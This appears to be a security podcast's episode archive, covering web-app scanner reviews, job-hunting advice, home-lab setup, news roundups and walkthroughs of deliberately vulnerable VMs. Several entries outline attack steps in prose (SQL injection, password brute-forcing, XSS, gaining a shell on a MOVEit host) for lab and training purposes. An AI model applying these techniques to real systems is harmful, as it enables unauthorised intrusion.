- I don't really like the idea of partnering with a company that offers a Webapp scanning tool in a mix of other tools because I question what the support/service chain will be like and how quickly my issues will be attention. Netsparker, in contrast, only makes Netsparker, which I like.
View this episode's show notes for more information
Published: Thursday, February 23, 2017
In part 3 of our Webapp pentest tool bake-off we're talking about... Netsparker In a nutshell, I was quite impressed with not only the product itself, but my interaction with the sales/support folks as well. Here are the highlights of my experience with Netsparker:.
- Quick learning curve - I feel confident I could teach newbies this tool in a short period of time
- Boasts false-positive-free scanning
- Offers both a cloud and LAN-based install
- Can do multiple scans at once - you're limited only by the virtual hardware you install Netsparker on
- Flexible reporting - everything from a nitty-gritty tech detail report to a barebones C-level "OMG your site is on fire!" type of export
- Knowledgeable sales folks who are tech-savvy and gentle with their sales tactics
View this episode's show notes for more information
Published: Friday, February 17, 2017
In part two of today's bake-off, we focus our sights on:AppspiderOverall I think it's a very capable tool, but in today's episode I discuss some of my reservations/hang-ups with it:Next episode, we'll cover my front-runner for this contest: Netsparker!.
- Pricing - quite expensive!
- Can only run one scan at a time (tools like Netsparker can run multiple scans and are only limited by a machine's virtual hardware)
- Way too aggressive sales/account folks
- Getting hard-sold to also buy Metasploit/Nexpose etc.
View this episode's show notes for more information
Published: Thursday, February 09, 2017
Today I'm starting a mini-series about my experience with the following popular Webapp pentesting tools:Now to be clear, the goal of this bake-off is to find a tool for the more run-of-the-mill, "customer just wants to check a box" Webapps scan. So I'm not covering tools like Burp which I...
- Acunetix
- Appspider
- Netsparker
- Qualys
- Simple, clean interface
- Shallow learning curve so team members can get up and running with the tool quickly
- Wide variety of exporting/reporting options
- Can run both in a cloud-hosted or local-install configuration
View this episode's show notes for more information
Published: Thursday, February 02, 2017
TLDL: Hey everybody, I'm super excited to announce that the 7MS logo design contest is in its final stages. This episode is about my cool experience with 99designs and some uber-talented artists that wielded their talent into some friggin' sweet logo creations!VOTE FOR...
View this episode's show notes for more information
Published: Thursday, January 26, 2017
We've reached the end of this series, and I come into this final chapter bearing good news: I have a job! So in today's episode, I just wanted to kick back and share some cool things I'm working on as I ramp up in this new adventure (and that will also provide good topics for future...
- Netsparker
- HP WebInspect
- Qualys
- AppSpider
View this episode's show notes for more information
Published: Thursday, January 19, 2017
This is part 3 of a series on my transition to a new job. Today's episode is aimed particularly for those of you going after tech-focused position, such as a security analyst or pentester. Many of these positions require that you complete not only a verbal technical grilling to test your...
- Find the vulnerabilities
- Get root shell
- Timeline = 7-10 days
View this episode's show notes for more information
Published: Thursday, January 12, 2017
This is part 2 of a series on my transition to a new job (yes, again). Today we're focusing on resources to help you find new job, such as LinkedIn, recruiters, Careerbuilder.com, Indeed.com, etc. as well as some tips to help you stand above the other candidates vying for the same...
- Part 1: When it may be time to look for a new job (or not)
- Part 2: How to stand out during phone screenings and interviews
- Part 3: How to gracefully transition from old job to new job
- Part 4: Here's what I'm doing in my new gig!
- My name is spelled wrong.
- "Opportunity" is spelled wrong.
- Don't shorten words like you to u or are to r.
- I should be capitalized at the beginning of sentences.
- Keep emoticons out of job-related emails (at least until you work there and know your coworkers better).
- Interview yourself ahead of time - while you're in the car or shower or wherever, say out loud some answers to questions you're likely to get asked, like "Why did you leave your last company?" or "Tell us about a challenging client situation you've dealt with" or "Why do you want to work here?"
- Try to minimize "uhs" and "ums - this plays off the first bullet, but the more practice you have speaking aloud, the more you can convey the point/story you're trying to get across (while minimizing mumbling and bumbling).
- "Look me in the eyes!" - I can't tell you how many interviews I have been in where the interviewee stared at the floor. Or (and almost as bad) the interview was with several team members and the interviewee only looked at one person the whole time. Morale of this story? LOOK EVERYBODY IN THE ROOM IN THE EYES OFTEN. If you can't look me in the eyes, how can I expect you to look my clients in theirs?
- Don't wear jeans.
- Make sure your tie is tied appropriately and hanging the correct length (see this and this ).
- Make sure your tie is tucked in all the way around the collar - not sticking out.
- Your socks should match.
- Don't wear overalls.
- Take a shower shortly before the interview. And daily as well (hopefully you didn't need that reminder).
View this episode's show notes for more information
Published: Thursday, January 05, 2017
Goodbye, dream job...Yep, it's true. The dream job I started in 2016 has come to an end (TLDR: the position was moved overseas so my contract wasn't renewed) Sniff sniff...I'm gonna miss you.BUT that means I've been sharpening my job-hunting skills, hounding recruiters, punching up my resume and...
- Keep it short but sweet. Personally I think resumes should be three pages or less. If you had me a 17-page autobiography I'm going to suggest you get an agent and sell your novel on Amazon.com.
- It should be readable - using cartoon-letter fonts and mixed font sizes is not "creative" - it's an assault on eyeballs. 12-13pt font is awesome. 10 hurts. 16 is shouting.
- Are you human? - I really like to see an "Interests/Hobbies" section with things you do not related to work - what sports/instruments you play, charitable groups you're involved in, family activities, etc. It's a great conversation starter and often used as a way to remember you once the interview is over. "Yeah, I really liked the guy who had the side gig as a juggler...he had some funny stories!"
- Consider a "fake" phone number - if you're going to be submitting your resume to "cattle call" sites, you might want to use a Google Voice number as you might get a lot of calls. Many of those calls can be spammy and/or about positions you don't care about (see next section for more info).
- Consider a "fake" email address - playing off the point above, if your resume is getting passed around you might end up on every spam list known to man. If you own a domain you might want to create a "jobs@" address outside of your primary one to keep clutter to a minimum.
- Finding a job (good sites and resources to aid your search)
- Interviewing for a job (how to be awesome at writing and speaking, as well as tips for being humble and thankful)
View this episode's show notes for more information
Published: Wednesday, November 30, 2016
Be sure to scroll down and view the whole post as there is both audio and video coverage of today's episode!IntroWe're going to create an nmap script to help us get visibility into what's on (and changing in) our network. Then we'll use Papertrailapp to capture...
View this episode's show notes for more information
Published: Wednesday, November 23, 2016
Be sure to scroll down and view the whole post as there is both audio and video coverage of today's episode!IntroI'm going to show you some easy/cheap things you can do implement monitoring and alerting in your home or corporate network. Today we'll focus on installing and configuring Nessus (a...
View this episode's show notes for more information
Published: Thursday, November 17, 2016
Be sure to scroll down and view the whole post as there is both audio and video coverage of today's episode!IntroA few weeks ago I was asked to do a pentest with some odd restrictions. The target was a popular commercial Webapp called MOVEIt Central, and I would only have RDP access to a terminal...
- Background info about the MOVEit app.
- Details on the MOVEit scripting engine commands - the most fun of which is MiRunCommand :-)
- Once you've got local admin, check out my write-up on what I've learned so far about Empire to get your initial shell and start looking for additional interesting info like password hashes, enumerating other machines, etc.
- Check out the "quick wins" section of my BPATTY privesc page for additional things you might want to look for on a compromised host (LLMNR/WPAD/etc.)
View this episode's show notes for more information
Published: Thursday, November 10, 2016
Be sure to scroll down and view the whole post as there is both audio and video coverage of today's episode!IntroToday I'm going to walk you through pwning the Billy Madison VM hosted at VulnHub . To be blunt,...
- The ADHD project is where many of Billy's trolls and traps come from, including the SSH and telnet honeypot, as well as phony Wordpress site.
- I setup Billy's completely insecure SMB share using guidance from this blog post .
- ROT13.com is a nice ROT13 decoder.
- The fake SMTP server running on Billy is, appropriately, called FakeSMTP .
- The open-source FTP server used is called ColoradoFTP .
- Here's the slick pcap-parsing script courtesy of mrb3n813 (thank you Ben!).
- Setting up port knocking is pretty straightforward .
- If your Kali isn't pulling the latest version of Truecrack (3.6 at time of this writing) you might want to build from source like I did.
- Download Veracrypt here .
View this episode's show notes for more information
Published: Friday, November 04, 2016
Be sure to scroll down and view the whole post as there is both audio and video coverage of today's episode!IntroToday is part FIVE (insert menacing voice: "the final chapter!!!) of our series on attacking the OWASP Juice Shop which is...
- Identifying a vulnerable library that the Juice Shop should definitely not be using!
- Identifying an algorithm that also should not be used.
- Do some nifty z85 encoding/decoding.
- Craft a special coupon that will give us 80%+ off our next Juice Shop order!
- Injecting three XSS payloads of varying difficulty
- Fooling a file upload capability to let us upload whatever extensions we want - and whatever size we want too!
- Change the URL within a Juice Shop product description.
- Defeat a pesky URL redirect.
- Order a hidden item from the shop.
- Find a hidden language file within the site.
View this episode's show notes for more information
Published: Thursday, October 20, 2016
Be sure to scroll down and view the whole post as there is both audio and video coverage of today's episode!IntroToday is part FOUR of our continuing series on attacking the OWASP Juice Shop which is "an intentionally insecure webapp for...
- Leverage a union-based SQL injection vulnerability to squeeze juicy info out of the database, including usernames and password hashes!
- Crack the discovered hashes
- Change creds of one of our newly discovered users
- Remove all 5-star ratings from the feedback section
View this episode's show notes for more information
Published: Thursday, October 13, 2016
Be sure to scroll down and view the whole post as there is both audio and video coverage of today's episode!IntroToday is part three of our continuing series on attacking the OWASP Juice Shop which is "an intentionally insecure webapp...
- Using dirb to discover files/folders we might not otherwise see by just exploring Juice Shop in the browser.
- Learning about using/abusing null byte injection to trick the server into letting us download files we shouldn't be able to see.
- Using Burp and CO2 to identify and exploit SQL injection vulnerabilities.
View this episode's show notes for more information
Published: Thursday, October 06, 2016
Be sure to scroll down and view the whole post as there is both audio and video coverage of today's episode!IntroToday we're continuing our series on hacking apart the OWASP Juice Shop which is "an intentionally insecure webapp for...
- Score board ticker: as you complete the score board challenges, you get notified in real time at the top of the page!
- Continue codes: you can now save your progress at any time. This is especially handy if your Juice Shop container crashes or you need to reboot the VM it's hosted on (more on this next week).
- Pop an XSS box using the Juice Shop search box
- Brute-forcing the admin user's password
- Use Burp intercept to leave passive-aggressive Web site feedback under another user's name!
- Use Burp intercept to pay for a Juice Shop order in such a way that makes us rich! Muwahahahaha!!!
View this episode's show notes for more information
Published: Wednesday, September 28, 2016
Be sure to scroll down and view the whole post as there is both audio and video coverage of today's episode!IntroToday we're kicking of a multipart series all about hacking the OWASP Juice Shop which is "an intentionally insecure webapp...
View this episode's show notes for more information
Published: Thursday, September 22, 2016
Be sure to scroll down and view the whole post as there is both audio and video coverage of today's episode!IntroI know I'm old and unhip, but I just got turned on to Docker, and today I wanted to share two cool ways to use it to beef up your pentest skills:Install and run RainmapHave you heard...
View this episode's show notes for more information
Published: Thursday, September 15, 2016
Be sure to scroll down and view the whole post as there is both audio and video coverage of today's episode!First get your Kali updated!Make sure you update/fix your Kali sources.list and run a full apt-get update and apt-...
View this episode's show notes for more information
Published: Wednesday, September 07, 2016
Be sure to scroll down and view the whole post as there is both audio and video coverage of today's episode!Ubiquiti UniFi ControllerBack in episode #220 I went through how to get a cloud-hosted UniFi controller setup so...
View this episode's show notes for more information
Published: Friday, September 02, 2016
Be sure to scroll down and view the whole post as there is both audio and video coverage of today's episode!Background:Today's episode is part 3 of a series all about setting up a virtual pentesting lab for about 500 bucks. Part 1 talked...
View this episode's show notes for more information
Published: Wednesday, August 24, 2016
Be sure to scroll down and view the whole post as there is both audio and video coverage of today's episode!Today's episode is part 2 of a series all about setting up a virtual pentesting lab for about 500 bucks. Part 1 talked about getting...
- Create a DHCP server
- Create an associated VLAN for the DHCP range
- Followed this article to lock down the new network
- Added the new VLAN to the port groups on the ESXi host
View this episode's show notes for more information
Published: Thursday, August 18, 2016
Today's episode is part 1 of a series all about setting up a virtual pentesting lab for about 500 bucks. We're kicking off the series with a segment on selecting hardware, getting ESXi installed to a USB drive and then getting all the components hooked up and powered on.Grocery list:The config I...
- Samsung SM951 128GB M.2 NGFF PCIe Gen3 8Gb/s x4 Solid state drive SSD (2280), NVME ( MZVPV128HDGM-00000)
- Crucial 16GB Single DDR4 2133 MT/s (PC4-17000) SODIMM 260-Pin Memory - CT16G4SFD8213
- Intel NUC Kit NUC6i3SYH BOXNUC6I3SYH Silver/Black
- Samsung 850 EVO - 500GB - 2.5-Inch SATA III Internal SSD (MZ-75E500B/AM)
View this episode's show notes for more information
Published: Wednesday, August 10, 2016
Intro:The following is a semi-spoilerish walkthrough of the Tommy Boy VM from Vulnhub by 7MinSec .Semi-spoilery write-up:.
- A port scan will reveal port 80 and 8008 open. Explore them thoroughly, including /robots.txt, page source code, dirb results, etc.
- That recon will lead you to a content management system where a keen eye and attention to detail will divulge a hash that needs to be cracked to continue.
- From there you'll learn of an unstable service running on the box that is only up at certain times of the day, but can be connected to with rather basic credentials.
- After connecting to that service, you will receive a hint about a hidden "dropbox" area, which you can only connect to if you can present yourself a certain way to the site.
- When the dropbox area is fully uncovered you'll find some additional hints, including how to create a password list which will be used to crack a zip file full of passwords.
- Armed with that information you will have another bit of brute-forcing to do before you have a complete set of SSH credentials.
- Using the SSH credentials you should be able to restore the Callahan Web site, and then you've just got one last flag to grab before you can unlock the final treasure and consider the box pwn'd!
View this episode's show notes for more information
Published: Tuesday, August 09, 2016
Today's episode talks about why I'm moving from three episode releases down to one. It's a good thing, really!
View this episode's show notes for more information
Published: Friday, August 05, 2016
What follows are some of my favorite training opportunities, news bits, tools/scripts and humorous stories to send you into the weekend with!TrainingGeneral NewsTools/ScriptsMisc/Humor.
- The recording from the BHIS Webinar on Web App Security Training is now up on YouTube .
- Did you know your phone's battery status can lead to online tracking from advertisers and service providers, such as Uber ?
- Apple introduces bug bounty program at BlackHat - get $200k for finding vulns in certain Apple products! Wow!
- A group of security researchers found remote code execution and other ugly vulns on PornHub.com (not gonna link to that directly...but in case the name isn't self-explanatory, it's not a Disney site).
- Sandstorm.io looks to be a pretty cool way to create your own private cloud (the app collection looks decent as well).
- Here's a ghetto XSS cheatsheet containing "...XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering, but feel free to disagree or shoot your AK-74 in the air."
- When Google security reacher Tavis Ormandy sets his sights on something boy oh boy do people get passionate !
- I'm thinking of changing Friday's episode into a newsletter distribution instead. That way I can free up a bit more time to work on tech how-tos and VulnHub walkthroughs that have both audio and video options.
View this episode's show notes for more information
Published: Tuesday, August 02, 2016
Today is part 2 on our series about setting up a Ubiquiti EdgeRouter X and access point. The audio portion of this episode covers the following topics:1. Creating true VLAN isolationI made a boo-boo last week in that my setup did not create true VLAN isolation. The way I fixed it was to create a...
View this episode's show notes for more information
Published: Friday, July 29, 2016
What follows are some of my favorite training opportunities, news bits, tools/scripts and humorous stories to send you into the weekend with!TrainingSick and tired of having hackers and penetration testers find holes in your apps? Then join this session!We will cover free and open source tools...
- BHIS did a Webinar earlier today for developers. Per the email:
- CodeCombat was one of the training site John Strand mentioned on the BHIS pentest. Looks to possibly be even more fun than code.org !
- Exploit-Exercises.com looks to be a great way to learn more about Linux privesc, memory corruption, heap exploitation...
- LastPass had some (sorta) bad publicity this week around a few vulnerabilities . Both, however, need somebody to trick you into going to a bad link. So...don't do that :-). And, the LastPass article reminds us of some important security best practices which are always worth repeating:
- Need another reason to believe the Internet of Things is not ready/secure enough for the general public? Read what happens when ioT pet feeders fail .
- A hacker downloaded all of Vine using some curiosity and a Shodan-like search.
- This is not news but a good (and by good I mean terrifying) story about the disgruntled Citibank IT guy who had a bad review and then issued a command to nuke the configs on 10 core routers, disconnecting 90% of all Citibank networks across the country.
- Happy SysAdmin day! If you need a flawless workflow to solve any conundrum, look at this . Or, on a slightly more serious note, check out these 5 tips . TLDR:
- A new version of Burp is out featuring Burp Infiltrator !
- Rapid7 has a nice article on capturing network credentials using Metasploit modules instead of Responder like I usually do.
- Remember cree.py at all? Looks like it's baaaaaaack! .
- ...have a great weekend!
View this episode's show notes for more information
Published: Thursday, July 28, 2016
IMPORTANT: This is not related to today's episode but don't forget that my vulnerable VM, Tommy Boy, has been published on Vulnhub.com - please go there now or read my blog post on the VM to get started!In today's off-topic episode I talk about my...
- Have a blip in your Internet connection? Lose all progress in current mission!!!
- Gigs of updates to download on a regular basis, yet the game appears to be getting buggier.
- I beat one by walking away.
- Beat another while he was hoping around like a bunny.
- Beat another that got trapped between two cars.
- Dudes on my team love to celebrate a victory in the middle of the freaking battle we have not won yet while I'm left facing all the bad guys by myself!
- You can walk into a parking lot or hallway with zero bad guys, only to turn around a millisecond later and have it chock full of enemies.
- Sometimes the citizens you need to help (by giving water, supplies, etc.) float above my head, thus I'm unable to "reach" to pass them items.
- Had one level point me back and forth between two checkpoints for about 15 minutes. That was fun.
View this episode's show notes for more information
Published: Tuesday, July 26, 2016
Be sure to scroll down and view the whole post as there is both audio and video coverage of today's episode!Today is part 2 on our series about setting up a Ubiquiti EdgeRouter X and access point. The audio portion of this episode covers the following topics:Audio:1. Getting startedPlugging...
- live.com
- microsoft.com
- ubi.com
- ubisoft.com
- xbox.com
- xboxlive.com
View this episode's show notes for more information
Published: Friday, July 22, 2016
What follows are some of my favorite training opportunities, news bits, tools/scripts and humorous stories to send you into the weekend with!TrainingGeneral NewsResearchers with security firm Vectra Networks discovered that the Windows Print Spooler doesn't properly authenticate print drivers...
- A new version of ADHD is out! BHIS presented on it last week, and here's the video if you missed it.
- Be aware of the nasty "Point and Print" vulnerability that's lurking on our networks. According to the article:
- There is hope for users bit by Jigsaw malware! Presumably, all you'd need is Burp Suite to modify some requests and BAM - files back for 0 bitcoin!
- If you are in the market for an Android phone, Nexus is probably the way to go . Here are the key takeaways:
- OSX users might want to run this security check and get some further Mac-hardening recommendations.
- Spinning up a new server - say on Digital Ocean? Might want to grab this script to lock it down right quick.
- PC users should check out CertWatch which will "monitor any changes made to the Windows Certificate Stores on your system."
- I'm loving my Ubiquiti gear - I got this router and this AP and have lots more audio/video coming out about my setup (eventually). Note: Steve Gibson and Leo Laporte talk about this gear about an hour and three minutes into episode #569 .
- Wanna make $ hacking ethically? This might be the book for you .
- NMAP 7.25BETA1 is out with more nse-scripts, new ncap driver, and more goodies.
- PTF Framework just hit 1.8 - I highly recommend grabbing this if you end up moving between several machines for pentest engagements.
- Need some relaxing background music while you hack? MyNoise.net might be just the site for you.
- I don't understand Pokemon but this makes me smile .
- My TommyBoy VM will be submitted for "production" at VulnHub this weekend!
- I'm turning BPATTY into a GitHub project (!) so please start following the action there!
View this episode's show notes for more information
Published: Thursday, July 21, 2016
In today's episode I kick off a multi-part series on ditching my previously beloved Almond router in lieu of a Ubiquiti Edge Router X and [access...
- Initial setup
- Setting up VLANs and multiple, segmented SSIDs
- QoS
- Allowing all segmented networks to use a common printer
- Configuring a cloud controller for access point, allowing "anywhere" control and a cool voucher system for patrons of you guest wifi
- Install of Nessus to monitor and regularly scan your Internet connection
- And more!
View this episode's show notes for more information
Published: Saturday, July 16, 2016
What follows are some of my favorite training opportunities, news bits, tools/scripts and humorous stories to send you into the weekend with!TrainingGeneral NewsYour conversations on Messenger will not be end-to-end encrypted by default, like what WhatsApp and Apple are offering. Instead,...
- The Webinar for the BHIS webinar on Active Defense Harbinger Distribution is coming up Tue, July 19 at 1 p.m. CST.
- Interested in creating your own Pfsense firewall? Security Weekly's how-to looks like a great place to start.
- ExplainShell will help you make sense of long gnarly shell commands!
- Patch all the things! Boy I'm really liking Shavlik's coverage of Patch Tuesday, specifically their visual aids .
- I won't be downloading Pokemon Go . For Android users it's a privacy nightmare. Some of that nightmare is patched on the iOS side, but...yeah, just, no.
- Facebook adds end-to-end encryption ! Just make sure that when you get it, you turn it on!
- Twitter CEO Jack Dorsey's account was hacked . While the exact "how" is not known, do some basic things to protect your account:
- Long/strong/unique passwords per site!
- Turn on 2FA
- Check which apps have access to your Twitter account
- Speaking of passwords and password reuse, you can test password reuse using Shard but I'm too paranoid.
- This $50 Ubiquiti router recommended by Steve Gibson looks dead sexy as a home router: multi-WAN, true firewall, DHCP, DNS, VLANning, the whole 9 yards!
- Part 2 of the awesome Attacking KeePass blog came out, and while I don't understand 98% of part 1, I hope to digest part 2 some day as well!
- Do you keep 3.5 bazillion tabs open at once? If so, read how this writer for The Hacker News manages all those tabs using a Chrome extension called The Great Suspender , which:
- Nintendo launching a mini NES in November. #WANT!
View this episode's show notes for more information
Published: Tuesday, July 12, 2016
In this episode, I share a short list of virtual landmines you'll want to avoid when building your vulnerable VM for vulnhub.com:.
- Don't f up your mysql root password
- Remember that Web services may install with a hard coded IP so you'll need to account for that when the machine is templated and then booted on different subnets
- Watch out for IPv6! It can mess up a lot of the maintenance scripts you may have to implement to accommodate for IP address changes.
View this episode's show notes for more information
Published: Friday, July 08, 2016
What follows are some of my favorite training opportunities, news bits, tools/scripts and humorous stories to send you into the weekend with!TrainingGeneral News"These vulnerabilities are as bad as it gets. They don't require any user interaction, they affect the default configuration, and the...
- Check out this How to Hack and Defend Your Website course. It was one of my first introductions to Webapp pentesting and started me on the path I'm on today.
- The Webinar for the BHIS webinar on Active Defense Harbinger Distribution was going to be today, but has been pushed to Tue, July 19 at 1 p.m. CST.
- TP-Link loses control of two important domains (tplinkextender.net and tplinklogin.net). You can have one of them for just a cool $2.5 mil!
- Do you use Symantec AV? It's probably time to switch .
- Here's a great guide for removing crapware from your machine once and for all! Microsoft is developing their own tool (not out yet) to deal with this as well.
- Here's yet another reason I won't hook up any video cams in my house until the ioT is a bit more mature...don't want Lizard squad turning it into a botnet!
- Want to learn how to attack Keepass during your next pentest? Harmj0y's got an awesome article on it (bookmark this site!). In summary, harmj0y says:
- An icky Mac malware could give someone total control of your machine. Here's a nice PDF write-up with screenshots and more details .
- NIST has a nifty guide to securing Apple OSX 10.10 for IT pros.
- Sn1per was recently updated with some new tools, modes and a reporting interface. This might just take the place of Sparta as my favorite enum tool!
- If you're looking for a guide to help your technically challenged friends/family secure their machines and networks DON'T SEND THEM THIS ONE .
- Love recording Adele when you see her live? A new Apple patent might block you from doing that in the future.
View this episode's show notes for more information
Published: Thursday, July 07, 2016
In today's episode I share some big news (SPOILER ALERT: I'm building a vulnhub.com vulnerable VM!) and also tell you about a client that was happy to pay me to watch progress bars for hours, but not happy to give me a 15 minute break for dinner.
View this episode's show notes for more information
Published: Monday, July 04, 2016
IntroThe following is a semi-spoilerish walkthrough of the Mr. Robot VM from Vulnhub by Jason (couldn't find a link for him! Hrmm....mysterious!).Write-upFlag 1:An NMAP scan will reveal port 80/443 open. Do the "usual...
View this episode's show notes for more information
Published: Friday, July 01, 2016
What follows are some of my favorite training opportunities, news bits, tools/scripts and humorous stories to send you into the weekend with!TrainingGeneral NewsRepeatedly, the red team intruders followed a straightforward process: Find credentials for a high-level account, and then use those...
- The BHIS recording for the "Fade from WhiteHat to Black" Webcast is up. The slides are here and video is here .
- BHIS is also releasing the new version of ADHD and discuss it in a Webcast on Friday, July 8 at 2 p.m. EST. Register here .
- Are you in charge of securing Ubuntu servers? This first 10 minutes on a server primer should help you get it locked down right quick.
- Need a good list of pentest-focused Twitter peeps to follow? This should do.
- Planatir, a data analysis firm, did a red team exercise that resulted in complete control of the Planatir network:
- GoToMyPC was targeted with a very sophisticated password attack and is resetting user passwords immediately.
- Google's CEO had his Twitter account hacked . According to the article:
- Carbonite users are being asked to reset their passwords after a password reuse attack pounded the Carbonite servers.
- Apple will let you delete annoying stock apps in iOS 10 . Bye bye Compass, Find My Friends, iBooks, iCloud Drive, Calculat...well maybe I'll keep you, Calculator.
- A researcher notified a company about unencrypted patient info on their FTP server. The company's response? Send 15 FBI agents with large guns .
- Learning how to do incident response? Take this example from FIS Global and Guaranty Bank and Trust on how not to do it .
- You might want to look at your Google activity to see/control how much they know about you.
- I'm not trying to pick on Android, but when I hear there is malware out there about to root 90% of Android devices I get queasy.
- Great pentesting cheatsheet from Highon.coffee that I don't think I'd linked to before.
- A new version of THC-Hydra is out. I hope they fix the login form issue I talked about Monday, where you can't really tell Hydra "Hey, as you are brute-ing a form, whenever you get kicked back a page that's not a login form, it might be a successful login, so lemme know!"
- Hashes.org has a great list of password hashes from various leaks/breaches.
- I didn't know you could use macros for authenticated Burp tests but apparently you can!
- Still don't think you should cover your Webcam? Maybe reading how a simple bash script can stealthily take pics every 60 seconds will convince you.
- Want to do some traffic-sniffing via a wifi pentest? Wif-Eye looks interesting.
- Evernote is hobbling its free service, so you might want to move to OneNote .
- Half-dead fish comes back to life !
- Work stressing you out? Maybe Terminal Parrot will relieve some stress.
View this episode's show notes for more information
Published: Wednesday, June 29, 2016
This off-topic episode is about a "friend" (I'm using air quotes) of mine who stole a set of drums from me. Then he sold them for dirt cheap, promised to pay me back (but didn't) and force me to take him to court. "Fun stuff!" Brian said sarcastically! Tune into today's episode to see where this...
View this episode's show notes for more information
Published: Tuesday, June 28, 2016
IntroThe following is a semi-spoilerish walkthrough of the Sidney VM from Vulnhub by Knightmare2600 .Write-upRunning NMAP on this rascal reveals port 80 to be open. I conducted a dirb...
View this episode's show notes for more information
Published: Monday, June 20, 2016
IntroThe following is a semi-spoilerish walkthrough of the Stapler VM from Vulnhub by g0tmi1k .Write-upAn NMAP scan reveals all sorts of goodies on this little rascal, including TCP 666...
View this episode's show notes for more information
Published: Friday, June 17, 2016
What follows are some of my favorite training opportunities, news bits, tools/scripts and humorous stories to send you into the weekend with!TrainingWhen your job is to act as a malicious attacker on a daily basis for the good of helping organizations, you can’t help but wonder “What if I decided...
- BHIS has a Webcast coming up June 23rd from 2p-3p EST described as:
- Tim Tomes PWAPT (Practical Web Application Penetration Testing) is coming to Boston on July 18-19. In Tim's invite he says:
- Tradecraft Tuesday looks like a fun/interactive way to hear about the latest hacker techniques:
- Who doesn't like free books? Especially related to security and hacking! Keep looking at Packtpub's free learning page often to get a continuous stream of great e-books (special thanks to Lorddrachenblut and Xoke for the tip (and speaking of free training, be sure to check out their Open FOSS Training site.
- A reminder to patch all your Microsoft things as this patch Tuesday was a big one:
- 16 batch bundles addressing 40+ flaws - including BadTunnel which affects all versions of Windows going as far back as Win 95.
- Lets Encrypt let a few emails slip :
- Speaking of letting emails slip, I got a goofy one from the UPS Store this week (listen to today's episode for more info).
- There's a Flash 0-day floating around , so you should probably disable Flash if you haven't already. Who needs it? Not me! Anyway, keep an eye on Adobe's bulletin for the upcoming fix.
- GitHub got slammed by credential-bruting attack using reused usernames and passwords from other recent breaches. Might be a good idea to change that password, just in case. Here's Github's statement on the matter.
- uTorrent forms were also breached so you might want to change your password there as well.
- If you use 2FA that's great! However, just make sure not to fall for this text scam which thwarts it.
- Who hacked the Democratic National Committee? CrowdStrike concluded it was multiple Russian hacker groups but then a lone hacker named Guccifer took credit . Either way, Tomer Weingarten, CEO of SentinelOne, emphasized that attribution is tough :
- Microsoft to buy LinkedIn for for $26 BEEELION dollars . Personally, I only wonder if this means Clippy will make a comeback ?!
- The ClamAV (sorta) 0-day is embarassing . What's maybe more embarrassing is there are so many machines exposed to the Internet running it!
- Pentesting a solid network? Use Nessus as a weapon .
- It looks like you can get a 10-device license for Sophos Home for free . Note: this is not any kind of referral link and I'm not getting any perks/payment or anything like that. I signed up and haven't installed it yet, but looks to be legit!
- A whole slew of Steam games and other goodies are on sale via a "pay what you want" offering from HumbleBundle .
- I think we've all felt like Info Security Jerk at one time or another:
- Coworkers leaving their computer unlocked? Maybe ruining their search history will teach them better.
- 7ms.us has some BPATTY updates:
- Table of contents (finally, I know ;-)
- Added section on using SimpleHTTPServer with specific port
- Added reminder to "make" aha before running it
- Added SSH example to the Hydra section
- Section on using cat to get a list of only unique values from a file
- Started section on wget
View this episode's show notes for more information
Published: Thursday, June 16, 2016
Today's off-topic show is one of my favorite IT horror stories, featuring a red-hot angry lawyer who was having password issues. I had the joy of dealing with his hair-trigger temper on a Saturday over a crappy cell phone connection.The burning question I needed to answer: was this guy fat-...
View this episode's show notes for more information
Published: Tuesday, June 14, 2016
Update 6/15: Sorry, I know I said on today's episode I was going to do a video version of this VM, but I'm jumping ship on that idea. The reason is I'm already excited about making a podcast + video version of a different VM. And, selfishly, that also allows me to be able to release some fresh...
View this episode's show notes for more information
Published: Friday, June 10, 2016
What follows are some of my favorite training opportunities, news bits, tools/scripts and humorous stories to send you into the weekend with!TrainingI've added some new content to this edition of PWAPT. The new content includes advanced vulnerabilities such as Blind SQL Injection, DOM XSS, and...
- Tim Tomes PWAPT (Practical Web Application Penetration Testing) is coming to Boston on July 18-19. In Tim's invite he says:
- Interested in learning Linux? LinuxJourney looks to be a great site with several levels of learning - from "Grasshopper" to "Networking Nomad."
- Big breach o' the week is ~100 million VK.com accounts (VK is kind of like a Russian version of Facebook). Compromised data includes names, phone numbers, email addresses and plain text passwords.
- Zuck got some of his social media accounts pwned . Lesson learned: dadada isn't a strong password!
- Hacker posts 39 million account creds in security "protest" "including names, email addresses, dates of birth, genders, and even social information." Why? Referencing the hacker's Pastebin post:
- TeamViewer accounts are still being taken over - allegedly due to credential reuse. Regardless, people are freaking out . Also, TeamViewer is sorry about blaming users for the hack. Says PR head Axel Schmidt:
- Last week we talked about Microsoft using a "known bad passwords" list and it looks like Netflix is doing the same .
- Tor Project member Jacob Applebaum stepped down from the project amid allegations of sexual misconduct . Risky Business has more coverage on it in this week's episode .
- Was Twitter pwned? Maybe but it's probably a good idea to change your Twitter passwords and turn on 2FA if not already enabled.
- Acunetix Web site got defaced due to an outdated Wordpress install and/or plugins...or so it was reported . But Acunetix called BS on that in a statement quoted by this article :
- I'm curious to try Brave , a browser that blocks ads and trackers, yet offers (what they claim to be) a micropayment system that could make both advertisers and end users some $. According to this Urbanophile.com article :
- Shopping for a new apartment or condo? Be sure not to sign anything that binds you to giving the property positive reviews or "likes" on social media like this awful facility in Salt Lake City did.
- Listener Xoke tipped me off to a hacking game for Steam called Hacknet . It's described as:
View this episode's show notes for more information
Published: Thursday, June 09, 2016
In this first ever 7MS audio clip extravaganza, I offer the following two mini-journeys for your ears:I get my young son red hot mad at me as I sing I See the Moon and even some Beyonce tunes to cheer him up.I entered a contest to remix a Barenaked Ladies song (Easy), but they wouldn't even...
View this episode's show notes for more information
Published: Tuesday, June 07, 2016
IntroThe following is a semi-spoilerish walkthrough of the Milnet VM from Vulnhub by @teh_warriar .DisclaimerI'm intentionally not posting a full walkthrough for a few reasons:Full (and...
View this episode's show notes for more information
Published: Friday, June 03, 2016
What follows are some of my favorite training opportunities, news bits, tools/scripts and humorous stories to send you into the weekend with!TrainingI've added some new content to this edition of PWAPT. The new content includes advanced vulnerabilities such as Blind SQL Injection, DOM XSS, and...
- Tim Tomes PWAPT (Practical Web Application Penetration Testing) is coming to Boston on July 18-19. In Tim's invite he says:
- LinkedIn, Tumblr, Myspace, Fling and others have had some breach issues this past week. Nice to see LinkedIn finally came clean about theirs.
